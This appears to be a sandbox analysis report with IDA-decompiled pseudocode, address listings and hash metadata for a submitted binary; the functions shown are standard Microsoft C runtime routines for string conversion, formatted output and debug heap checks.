    0x00b96eb1
    0x00b96eb6
    0x00b96eb9
    0x00b96ec6
    0x00b96ed4
    0x00b96ee7
    0x00b96eec
    0x00b96efb
    0x00000000
    0x00b96efb
    0x00b96ec8
    0x00b96ec8
    0x00000000
    0x00b96ec8
    0x00b96f06
    0x00b96f23
    0x00b96f2a
    0x00b96f48
    0x00b96f4d
    0x00b96f4d
    0x00000000
    0x00b96f2a
    0x00b964f7
    0x00b964f7
    0x00b964fe
    0x00b96504
    0x00b9650a
    0x00b9650d
    0x00b96513
    0x00b96520
    0x00b96526
    0x00b96526
    0x00b9652d
    0x00000000
    0x00b968b1
    0x00b968b1
    0x00b968bf
    0x00b968c2
    0x00000000
    0x00000000
    0x00b96534
    0x00b96537
    0x00b9653d
    0x00b96542
    0x00b96545
    0x00b96545
    0x00000000
    0x00000000
    0x00b9667a
    0x00b9667d
    0x00b96682
    0x00b96687
    0x00b9668a
    0x00b9668a
    0x00000000
    0x00000000
    0x00b96a7d
    0x00b96a7d
    0x00000000
    0x00000000
    0x00b965e4
    0x00b965e4
    0x00b965f0
    0x00b965fd
    0x00b9660b
    0x00b9660b
    0x00b96611
    0x00b96614
    0x00b96620
    0x00b96675
    0x00000000
    0x00b96675
    0x00b965ff
    0x00b965ff
    0x00b96609
    0x00b96625
    0x00b96628
    0x00b9662e
    0x00b96656
    0x00b9665d
    0x00b96663
    0x00b96666
    0x00b96669
    0x00b9666f
    0x00b96672
    0x00b96630
    0x00b96630
    0x00b96636
    0x00b96639
    0x00b9663c
    0x00b96642
    0x00b96645
    0x00b96648
    0x00b9664a
    0x00b9664d
    0x00b9664d
    0x00000000
    0x00b9662e
    0x00000000
    0x00000000
    0x00b968c9
    0x00b968cc
    0x00b968cf
    0x00b968d2
    0x00b968d8
    0x00b968db
    0x00b968e6
    0x00b968f1
    0x00b968f5
    0x00b9690c
    0x00b96913
    0x00b96915
    0x00b96915
    0x00b9691c
    0x00b96923
    0x00b96931
    0x00b96934
    0x00b96943
    0x00b9694a
    0x00b9695f
    0x00b9694c
    0x00b9694c
    0x00b9694f
    0x00b96955
    0x00b9695a
    0x00b9695a
    0x00b9694a
    0x00b96969
    0x00b9696c
    0x00b9696f
    0x00b96972
    0x00b96975
    0x00b96978
    0x00b9697e
    0x00b96984
    0x00b9698c
    0x00b9698d
    0x00b96990
    0x00b96991
    0x00b96994
    0x00b96995
    0x00b9699c
    0x00b9699d
    0x00b969a0
    0x00b969a1
    0x00b969a4
    0x00b969a5
    0x00b969ab
    0x00b969ac
    0x00b969bb
    0x00b969bd
    0x00b969c3
    0x00b969c8
    0x00b969d0
    0x00b969d8
    0x00b969d9
    0x00b969dc
    0x00b969dd
    0x00b969ec
    0x00b969ee
    0x00b969ee
    0x00b969f1
    0x00b969fb
    0x00b96a00
    0x00b96a06
    0x00b96a08
    0x00b96a10
    0x00b96a11
    0x00b96a14
    0x00b96a15
    0x00b96a23
    0x00b96a25
    0x00b96a25
    0x00b96a06
    0x00b96a28
    0x00b96a2b
    0x00b96a31
    0x00b96a36
    0x00b96a3b
    0x00b96a41
    0x00b96a44
    0x00b96a44
    0x00b96a47
    0x00b96a53
    0x00000000
    0x00b96a53
    0x00b968f7
    0x00b968f7
    0x00b96901
    0x00000000
    0x00000000
    0x00b96903
    0x00b96903
    0x00000000
    0x00b96903
    0x00b968e8
    0x00b968e8
    0x00000000
    0x00000000
    0x00b96548
    0x00b96548
    0x00b96553
    0x00b9655b
    0x00b96562
    0x00b96565
    0x00b96568
    0x00b965c8
    0x00b9656a
    0x00b96571
    0x00b96577
    0x00b9657d
    0x00b96584
    0x00b96587
    0x00b9658d
    0x00b96595
    0x00b96597
    0x00b9659e
    0x00b965a5
    0x00b965b6
    0x00b965b8
    0x00b965b8
    0x00b965bf
    0x00b965cf
    0x00b965d5
    0x00b965d8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b967ba
    0x00b967ba
    0x00b967c6
    0x00b967d3
    0x00b9687d
    0x00b9687d
    0x00b96880
    0x00b96883
    0x00b96897
    0x00b9689d
    0x00b968a3
    0x00b96885
    0x00b96885
    0x00b9688b
    0x00b96892
    0x00b96892
    0x00b968a5
    0x00000000
    0x00b968a5
    0x00b967d9
    0x00b967d9
    0x00b967db
    0x00b967e9
    0x00b967dd
    0x00b967dd
    0x00b967dd
    0x00b967f3
    0x00b967f9
    0x00b96806
    0x00b96808
    0x00b9680d
    0x00b9680f
    0x00b96814
    0x00b96819
    0x00b9681b
    0x00b96820
    0x00b96826
    0x00b96828
    0x00b96828
    0x00b96826
    0x00b96830
    0x00b96878
    0x00000000
    0x00b96832
    0x00b96832
    0x00b96837
    0x00b96853
    0x00b9685b
    0x00b96865
    0x00b96868
    0x00b9686d
    0x00000000
    0x00b9686d
    0x00000000
    0x00b96ac4
    0x00b96ac4
    0x00b96ace
    0x00b96ad4
    0x00b96ad9
    0x00b96adf
    0x00b96adf
    0x00000000
    0x00000000
    0x00b96a76
    0x00b96a76
    0x00000000
    0x00000000
    0x00b9668d
    0x00b96691
    0x00b9669f
    0x00b966a2
    0x00b96693
    0x00b96693
    0x00b96693
    0x00b966a8
    0x00b966ae
    0x00b966b4
    0x00b966c0
    0x00b966c6
    0x00b966c9
    0x00b96751
    0x00b96755
    0x00b96757
    0x00b9675d
    0x00b9675d
    0x00b96760
    0x00b96767
    0x00b9676a
    0x00b96770
    0x00b96770
    0x00b96770
    0x00b96776
    0x00b9677c
    0x00b9677f
    0x00b96787
    0x00000000
    0x00000000
    0x00b96789
    0x00b96789
    0x00b9678f
    0x00b96794
    0x00000000
    0x00000000
    0x00b96796
    0x00b9679c
    0x00b9679f
    0x00b9679f
    0x00b967a7
    0x00b967ad
    0x00b967b0
    0x00b967b2
    0x00000000
    0x00b966cf
    0x00b966cf
    0x00b966d3
    0x00b966d5
    0x00b966da
    0x00b966da
    0x00b966dd
    0x00b966e0
    0x00b966e6
    0x00b966f8
    0x00b966f8
    0x00b966f8
    0x00b96701
    0x00000000
    0x00000000
    0x00b96703
    0x00b96703
    0x00b96709
    0x00b9670e
    0x00000000
    0x00000000
    0x00b96710
    0x00b96710
    0x00b96719
    0x00b9671f
    0x00b9672d
    0x00b96735
    0x00b96738
    0x00b96738
    0x00b96744
    0x00b96747
    0x00b966f2
    0x00b966f5
    0x00b966f5
    0x00b9674f
    0x00b967b5
    0x00000000
    0x00b967b5
    0x00000000
    0x00b96a6d
    0x00b96a6d
    0x00000000
    0x00000000
    0x00b96a89
    0x00b96a89
    0x00b96a93
    0x00b96a93
    0x00b96a9d
    0x00b96aa3
    0x00b96aa5
    0x00b96aaa
    0x00b96ab4
    0x00b96ab7
    0x00b96abb
    0x00b96abb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b9652d
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96bc7
    0x00b96bbe
    0x00b96ae2
    0x00b96ae2
    0x00b96ae2

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
    • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
    • API String ID: 3455034128-2408376751
    • Opcode ID: c72948c7bdc89c2b327c03f3a0408963560122482a58fa10c31c8219c298ba8f
    • Instruction ID: cfe15d208459a5f3cd48aeb8b46958b822b1ba2bf905e3cb5af8158611844a21
    • Opcode Fuzzy Hash: c72948c7bdc89c2b327c03f3a0408963560122482a58fa10c31c8219c298ba8f
    • Instruction Fuzzy Hash: B6F105B1E002299FDF24CF58C881BAEB7F5EB85304F1481E9E259AB251D7349E84CF59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E00B927C3() {
    				intOrPtr* _t143;
    				signed int* _t145;
    				int _t150;
    				intOrPtr* _t167;
    				intOrPtr _t189;
    				void* _t206;
    				intOrPtr _t223;
    				intOrPtr _t230;
    				void* _t272;
    				void* _t273;
    				signed int _t274;
    
    				if( *(_t274 + 8) == 0) {
    					_t143 = E00B7C680(_t274 - 0x20);
    					_t208 =  *_t143;
    					if( *((intOrPtr*)( *_t143 + 0x14)) != 0) {
    						_t210 = _t274 - 0x20;
    						_t145 = E00B7C680(_t274 - 0x20);
    						_t256 =  *_t145;
    						 *(_t274 - 4) = WideCharToMultiByte( *( *_t145 + 4), 0,  *(_t274 + 0xc), 0xffffffff, 0, 0, 0, _t274 - 0x10);
    						if( *(_t274 - 4) == 0 ||  *(_t274 - 0x10) != 0) {
    							 *((intOrPtr*)(L00B80C60(_t210))) = 0x2a;
    							 *(_t274 - 0x68) = 0xffffffff;
    							E00B7C650(_t274 - 0x20);
    							_t150 =  *(_t274 - 0x68);
    						} else {
    							 *(_t274 - 0x6c) =  *(_t274 - 4) - 1;
    							E00B7C650(_t274 - 0x20);
    							_t150 =  *(_t274 - 0x6c);
    						}
    					} else {
    						_t256 =  *(_t274 + 0xc);
    						 *(_t274 - 0x64) = E00B899A0(_t208,  *(_t274 + 0xc));
    						E00B7C650(_t274 - 0x20);
    						_t150 =  *(_t274 - 0x64);
    					}
    					L47:
    					return E00B805D0(_t150, _t206,  *(_t274 - 0x24) ^ _t274, _t256, _t272, _t273);
    				}
    				if( *((intOrPtr*)( *((intOrPtr*)(E00B7C680(_t274 - 0x20))) + 0x14)) != 0) {
    					if( *((intOrPtr*)( *((intOrPtr*)(E00B7C680(_t274 - 0x20))) + 0xac)) != 1) {
    						_t223 =  *((intOrPtr*)(E00B7C680(_t274 - 0x20)));
    						_t256 =  *(_t223 + 4);
    						 *(_t274 - 4) = WideCharToMultiByte( *(_t223 + 4), 0,  *(_t274 + 0xc), 0xffffffff,  *(_t274 + 8),  *(_t274 + 0x10), 0, _t274 - 0x10);
    						if( *(_t274 - 4) == 0 ||  *(_t274 - 0x10) != 0) {
    							if( *(_t274 - 0x10) != 0 || GetLastError() != 0x7a) {
    								 *((intOrPtr*)(L00B80C60(_t223))) = 0x2a;
    								 *(_t274 - 0x4c) = 0xffffffff;
    								E00B7C650(_t274 - 0x20);
    								_t150 =  *(_t274 - 0x4c);
    							} else {
    								while( *(_t274 - 4) <  *(_t274 + 0x10)) {
    									_t167 = E00B7C680(_t274 - 0x20);
    									_t230 =  *((intOrPtr*)(E00B7C680(_t274 - 0x20)));
    									_t256 =  *(_t230 + 4);
    									 *((intOrPtr*)(_t274 - 0xc)) = WideCharToMultiByte( *(_t230 + 4), 0,  *(_t274 + 0xc), 1, _t274 - 0x2c,  *( *_t167 + 0xac), 0, _t274 - 0x10);
    									if( *((intOrPtr*)(_t274 - 0xc)) == 0 ||  *(_t274 - 0x10) != 0) {
    										 *((intOrPtr*)(L00B80C60(_t230))) = 0x2a;
    										 *(_t274 - 0x50) = 0xffffffff;
    										E00B7C650(_t274 - 0x20);
    										_t150 =  *(_t274 - 0x50);
    									} else {
    										if( *((intOrPtr*)(_t274 - 0xc)) < 0 ||  *((intOrPtr*)(_t274 - 0xc)) > 5) {
    											 *((intOrPtr*)(L00B80C60(_t230))) = 0x2a;
    											 *(_t274 - 0x54) = 0xffffffff;
    											E00B7C650(_t274 - 0x20);
    											_t150 =  *(_t274 - 0x54);
    										} else {
    											if( *(_t274 - 4) +  *((intOrPtr*)(_t274 - 0xc)) <=  *(_t274 + 0x10)) {
    												 *(_t274 - 8) = 0;
    												while( *(_t274 - 8) <  *((intOrPtr*)(_t274 - 0xc))) {
    													( *(_t274 + 8))[ *(_t274 - 4)] =  *((intOrPtr*)(_t274 +  *(_t274 - 8) - 0x2c));
    													_t256 =  &(( *(_t274 + 8))[ *(_t274 - 4)]);
    													if(( *(_t274 + 8))[ *(_t274 - 4)] != 0) {
    														 *(_t274 - 8) =  *(_t274 - 8) + 1;
    														 *(_t274 - 4) =  *(_t274 - 4) + 1;
    														continue;
    													}
    													 *(_t274 - 0x5c) =  *(_t274 - 4);
    													E00B7C650(_t274 - 0x20);
    													_t150 =  *(_t274 - 0x5c);
    													goto L47;
    												}
    												_t256 =  &(( *(_t274 + 0xc))[1]);
    												 *(_t274 + 0xc) =  &(( *(_t274 + 0xc))[1]);
    												continue;
    											}
    											 *(_t274 - 0x58) =  *(_t274 - 4);
    											E00B7C650(_t274 - 0x20);
    											_t150 =  *(_t274 - 0x58);
    										}
    									}
    									goto L47;
    								}
    								 *(_t274 - 0x60) =  *(_t274 - 4);
    								E00B7C650(_t274 - 0x20);
    								_t150 =  *(_t274 - 0x60);
    							}
    						} else {
    							 *(_t274 - 0x48) =  *(_t274 - 4) - 1;
    							E00B7C650(_t274 - 0x20);
    							_t150 =  *(_t274 - 0x48);
    						}
    						goto L47;
    					}
    					if( *(_t274 + 0x10) > 0) {
    						 *(_t274 + 0x10) = E00B92BB0( *(_t274 + 0xc),  *(_t274 + 0x10));
    					}
    					_t256 =  *(_t274 + 0xc);
    					_t189 =  *((intOrPtr*)(E00B7C680(_t274 - 0x20)));
    					_t243 =  *(_t189 + 4);
    					 *(_t274 - 4) = WideCharToMultiByte( *(_t189 + 4), 0,  *(_t274 + 0xc),  *(_t274 + 0x10),  *(_t274 + 8),  *(_t274 + 0x10), 0, _t274 - 0x10);
    					if( *(_t274 - 4) == 0 ||  *(_t274 - 0x10) != 0) {
    						 *((intOrPtr*)(L00B80C60(_t243))) = 0x2a;
    						 *(_t274 - 0x44) = 0xffffffff;
    						E00B7C650(_t274 - 0x20);
    						_t150 =  *(_t274 - 0x44);
    					} else {
    						if( *((char*)( &(( *(_t274 + 8))[ *(_t274 - 4)]) - 1)) == 0) {
    							 *(_t274 - 4) =  *(_t274 - 4) - 1;
    						}
    						_t256 =  *(_t274 - 4);
    						 *(_t274 - 0x40) =  *(_t274 - 4);
    						E00B7C650(_t274 - 0x20);
    						_t150 =  *(_t274 - 0x40);
    					}
    					goto L47;
    				} else {
    					goto L2;
    				}
    				while(1) {
    					L2:
    					_t248 =  *(_t274 - 4);
    					if( *(_t274 - 4) >=  *(_t274 + 0x10)) {
    						break;
    					}
    					_t256 =  *(_t274 + 0xc);
    					if(( *( *(_t274 + 0xc)) & 0x0000ffff) <= 0xff) {
    						( *(_t274 + 8))[ *(_t274 - 4)] =  *( *(_t274 + 0xc));
    						_t256 =  *( *(_t274 + 0xc)) & 0x0000ffff;
    						 *(_t274 + 0xc) =  &(( *(_t274 + 0xc))[1]);
    						if(( *( *(_t274 + 0xc)) & 0x0000ffff) != 0) {
    							_t256 =  *(_t274 - 4) + 1;
    							 *(_t274 - 4) =  *(_t274 - 4) + 1;
    							continue;
    						}
    						 *(_t274 - 0x38) =  *(_t274 - 4);
    						E00B7C650(_t274 - 0x20);
    						_t150 =  *(_t274 - 0x38);
    					} else {
    						 *((intOrPtr*)(L00B80C60(_t248))) = 0x2a;
    						 *(_t274 - 0x34) = 0xffffffff;
    						E00B7C650(_t274 - 0x20);
    						_t150 =  *(_t274 - 0x34);
    					}
    					goto L47;
    				}
    				 *(_t274 - 0x3c) =  *(_t274 - 4);
    				E00B7C650(_t274 - 0x20);
    				_t150 =  *(_t274 - 0x3c);
    				goto L47;
    			}














    0x00b927c7
    0x00b92afe
    0x00b92b03
    0x00b92b09
    0x00b92b3b
    0x00b92b3e
    0x00b92b43
    0x00b92b4f
    0x00b92b56
    0x00b92b63
    0x00b92b69
    0x00b92b73
    0x00b92b78
    0x00b92b7d
    0x00b92b83
    0x00b92b89
    0x00b92b8e
    0x00b92b8e
    0x00b92b0b
    0x00b92b0b
    0x00b92b17
    0x00b92b1d
    0x00b92b22
    0x00b92b22
    0x00b92b9b
    0x00b92ba8
    0x00b92ba8
    0x00b927db
    0x00b92885
    0x00b92951
    0x00b92953
    0x00b9295d
    0x00b92964
    0x00b92989
    0x00b9299b
    0x00b929a1
    0x00b929ab
    0x00b929b0
    0x00b929b8
    0x00b929b8
    0x00b929cd
    0x00b929ef
    0x00b929f1
    0x00b929fb
    0x00b92a02
    0x00b92a0f
    0x00b92a15
    0x00b92a1f
    0x00b92a24
    0x00b92a2c
    0x00b92a30
    0x00b92a3d
    0x00b92a43
    0x00b92a4d
    0x00b92a52
    0x00b92a5a
    0x00b92a63
    0x00b92a7b
    0x00b92a96
    0x00b92aab
    0x00b92ab0
    0x00b92ab8
    0x00b92a8a
    0x00b92a93
    0x00000000
    0x00b92a93
    0x00b92abd
    0x00b92ac3
    0x00b92ac8
    0x00000000
    0x00b92ac8
    0x00b92ad5
    0x00b92ad8
    0x00000000
    0x00b92ad8
    0x00b92a68
    0x00b92a6e
    0x00b92a73
    0x00b92a73
    0x00b92a30
    0x00000000
    0x00b92a02
    0x00b92ae3
    0x00b92ae9
    0x00b92aee
    0x00b92aee
    0x00b9296c
    0x00b92972
    0x00b92978
    0x00b9297d
    0x00b9297d
    0x00000000
    0x00b92964
    0x00b9288f
    0x00b928a1
    0x00b928a1
    0x00b928b6
    0x00b928c4
    0x00b928c6
    0x00b928d0
    0x00b928d7
    0x00b92911
    0x00b92917
    0x00b92921
    0x00b92926
    0x00b928df
    0x00b928eb
    0x00b928f3
    0x00b928f3
    0x00b928f6
    0x00b928f9
    0x00b928ff
    0x00b92904
    0x00b92904
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b927e1
    0x00b927e1
    0x00b927e1
    0x00b927e7
    0x00000000
    0x00000000
    0x00b927e9
    0x00b927f4
    0x00b92823
    0x00b92828
    0x00b92831
    0x00b92836
    0x00b92851
    0x00b92854
    0x00000000
    0x00b92854
    0x00b9283b
    0x00b92841
    0x00b92846
    0x00b927f6
    0x00b927fb
    0x00b92801
    0x00b9280b
    0x00b92810
    0x00b92810
    0x00000000
    0x00b927f4
    0x00b9285c
    0x00b92862
    0x00b92867
    0x00000000

    APIs
    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00B9280B
    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00B92841
    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00B92862
    • wcsncnt.LIBCMTD ref: 00B92899
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00B928CA
    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00B928FF
    • _wcslen.LIBCMTD ref: 00B92B0F
    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00B92B1D
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide_wcslenwcsncnt
    • String ID:
    • API String ID: 4277434810-0
    • Opcode ID: 27a3f8b8984bb45ac19a2cac85a780e25f0e6b0c473dcac55f3d44984ef91cbe
    • Instruction ID: ff4fefeaed8ba5e39a54427fec3d1341a503ee606a1123fa4c7ea6a84eebed4a
    • Opcode Fuzzy Hash: 27a3f8b8984bb45ac19a2cac85a780e25f0e6b0c473dcac55f3d44984ef91cbe
    • Instruction Fuzzy Hash: 63D1A375900108EFCF14EF94C895AEEBBF1FF44314F2085A9E4266B2A1DB34AE45DB90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 00B7EDF7
    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00B7EDB9
    • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 00B7ED2F
    • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 00B7EC49
    • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 00B7EEEA
    • tDj, xrefs: 00B7EC7B
    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 00B7EE73
    • Client hook free failure., xrefs: 00B7EC9C
    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 00B7EEB1
    • _CrtIsValidHeapPointer(pUserData), xrefs: 00B7ECD1
    • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 00B7ECDD, 00B7ED3B, 00B7EEF6
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: BytesCheck$HeapPointerValid__free_base_memset
    • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ$tDj
    • API String ID: 25084783-3417358119
    • Opcode ID: 3e7ddf6a0bf51ed36023ac17753a659f7ba53b1f29b32258112860c7e81f873a
    • Instruction ID: 4fb65011847e3ef5fd31dd4898dac8b7b37ae743d665edf73961ac818c4a0e7b
    • Opcode Fuzzy Hash: 3e7ddf6a0bf51ed36023ac17753a659f7ba53b1f29b32258112860c7e81f873a
    • Instruction Fuzzy Hash: 4291E574A40204BBEB24DB48DD82F6A73E5EF48704F2485D4F628AB2D2D671EE41DB94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 65%
    			E00B95447(void* __eflags) {
    				signed int* _t494;
    				signed int _t502;
    				void* _t507;
    				signed int _t509;
    				void* _t529;
    				signed int _t547;
    				void* _t558;
    				signed int _t567;
    				void* _t625;
    				void* _t626;
    				signed int _t627;
    				void* _t629;
    				void* _t630;
    
    				L0:
    				while(1) {
    					L0:
    					_t494 = E00B93D50(_t627 + 0x14);
    					_t630 = _t629 + 4;
    					 *(_t627 - 0x298) = _t494;
    					if(E00B97280() != 0) {
    						goto L118;
    					}
    					L109:
    					__edx = 0;
    					if(0 == 0) {
    						 *(__ebp - 0x32c) = 0;
    					} else {
    						 *(__ebp - 0x32c) = 1;
    					}
    					__eax =  *(__ebp - 0x32c);
    					 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
    					if( *(__ebp - 0x29c) == 0) {
    						_push(L"(\"\'n\' format specifier disabled\", 0)");
    						_push(0);
    						_push(0x695);
    						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    						_push(2);
    						__eax = L00B7D760();
    						__esp = __esp + 0x14;
    						if(__eax == 1) {
    							asm("int3");
    						}
    					}
    					if( *(__ebp - 0x29c) != 0) {
    						L117:
    						while(1) {
    							L190:
    							if( *(_t627 - 0x28) != 0) {
    								goto L216;
    							}
    							L191:
    							if(( *(_t627 - 0x10) & 0x00000040) != 0) {
    								if(( *(_t627 - 0x10) & 0x00000100) == 0) {
    									if(( *(_t627 - 0x10) & 0x00000001) == 0) {
    										if(( *(_t627 - 0x10) & 0x00000002) != 0) {
    											 *((char*)(_t627 - 0x14)) = 0x20;
    											 *(_t627 - 0x1c) = 1;
    										}
    									} else {
    										 *((char*)(_t627 - 0x14)) = 0x2b;
    										 *(_t627 - 0x1c) = 1;
    									}
    								} else {
    									 *((char*)(_t627 - 0x14)) = 0x2d;
    									 *(_t627 - 0x1c) = 1;
    								}
    							}
    							 *((intOrPtr*)(_t627 - 0x2c4)) =  *((intOrPtr*)(_t627 - 0x18)) -  *(_t627 - 0x24) -  *(_t627 - 0x1c);
    							if(( *(_t627 - 0x10) & 0x0000000c) == 0) {
    								E00B95E80(0x20,  *((intOrPtr*)(_t627 - 0x2c4)),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
    								_t630 = _t630 + 0x10;
    							}
    							E00B95EC0( *(_t627 - 0x1c), _t627 - 0x14,  *(_t627 - 0x1c),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
    							_t630 = _t630 + 0x10;
    							if(( *(_t627 - 0x10) & 0x00000008) != 0) {
    								if(( *(_t627 - 0x10) & 0x00000004) == 0) {
    									E00B95E80(0x30,  *((intOrPtr*)(_t627 - 0x2c4)),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
    									_t630 = _t630 + 0x10;
    								}
    							}
    							if( *(_t627 - 0xc) == 0) {
    								L212:
    								E00B95EC0( *((intOrPtr*)(_t627 - 4)),  *((intOrPtr*)(_t627 - 4)),  *(_t627 - 0x24),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
    								_t630 = _t630 + 0x10;
    								goto L213;
    							} else {
    								L204:
    								if( *(_t627 - 0x24) <= 0) {
    									goto L212;
    								}
    								L205:
    								 *(_t627 - 0x2dc) = 0;
    								 *((intOrPtr*)(_t627 - 0x2c8)) =  *((intOrPtr*)(_t627 - 4));
    								 *(_t627 - 0x2cc) =  *(_t627 - 0x24);
    								while(1) {
    									L206:
    									 *(_t627 - 0x2cc) =  *(_t627 - 0x2cc) - 1;
    									if( *(_t627 - 0x2cc) == 0) {
    										break;
    									}
    									L207:
    									 *(_t627 - 0x32e) =  *((intOrPtr*)( *((intOrPtr*)(_t627 - 0x2c8))));
    									_t547 = E00B97890(_t627 - 0x2d0, _t627 - 0x2d8, 6,  *(_t627 - 0x32e) & 0x0000ffff);
    									_t630 = _t630 + 0x10;
    									 *(_t627 - 0x2dc) = _t547;
    									 *((intOrPtr*)(_t627 - 0x2c8)) =  *((intOrPtr*)(_t627 - 0x2c8)) + 2;
    									if( *(_t627 - 0x2dc) != 0) {
    										L209:
    										 *(_t627 - 0x24c) = 0xffffffff;
    										break;
    									}
    									L208:
    									if( *(_t627 - 0x2d0) != 0) {
    										L210:
    										E00B95EC0( *((intOrPtr*)(_t627 + 8)), _t627 - 0x2d8,  *(_t627 - 0x2d0),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
    										_t630 = _t630 + 0x10;
    										continue;
    									}
    									goto L209;
    								}
    								L211:
    								L213:
    								if( *(_t627 - 0x24c) >= 0) {
    									if(( *(_t627 - 0x10) & 0x00000004) != 0) {
    										E00B95E80(0x20,  *((intOrPtr*)(_t627 - 0x2c4)),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
    										_t630 = _t630 + 0x10;
    									}
    								}
    							}
    							L216:
    							if( *(_t627 - 0x20) != 0) {
    								L00B7EB20( *(_t627 - 0x20), 2);
    								_t630 = _t630 + 8;
    								 *(_t627 - 0x20) = 0;
    							}
    							while(1) {
    								L218:
    								 *(_t627 - 0x251) =  *( *(_t627 + 0xc));
    								_t598 =  *(_t627 - 0x251);
    								 *(_t627 + 0xc) =  *(_t627 + 0xc) + 1;
    								if( *(_t627 - 0x251) == 0 ||  *(_t627 - 0x24c) < 0) {
    									break;
    								} else {
    									if( *(_t627 - 0x251) < 0x20 ||  *(_t627 - 0x251) > 0x78) {
    										 *(_t627 - 0x310) = 0;
    									} else {
    										 *(_t627 - 0x310) =  *( *(_t627 - 0x251) +  &M00B77B58) & 0xf;
    									}
    								}
    								L7:
    								 *(_t627 - 0x250) =  *(_t627 - 0x310);
    								_t509 =  *(_t627 - 0x250) * 9;
    								_t567 =  *(_t627 - 0x25c);
    								_t598 = ( *(_t509 + _t567 + 0xb77b78) & 0x000000ff) >> 4;
    								 *(_t627 - 0x25c) = ( *(_t509 + _t567 + 0xb77b78) & 0x000000ff) >> 4;
    								if( *(_t627 - 0x25c) != 8) {
    									L16:
    									 *(_t627 - 0x318) =  *(_t627 - 0x25c);
    									if( *(_t627 - 0x318) > 7) {
    										continue;
    									}
    									L17:
    									switch( *((intOrPtr*)( *(_t627 - 0x318) * 4 +  &M00B95CD0))) {
    										case 0:
    											L18:
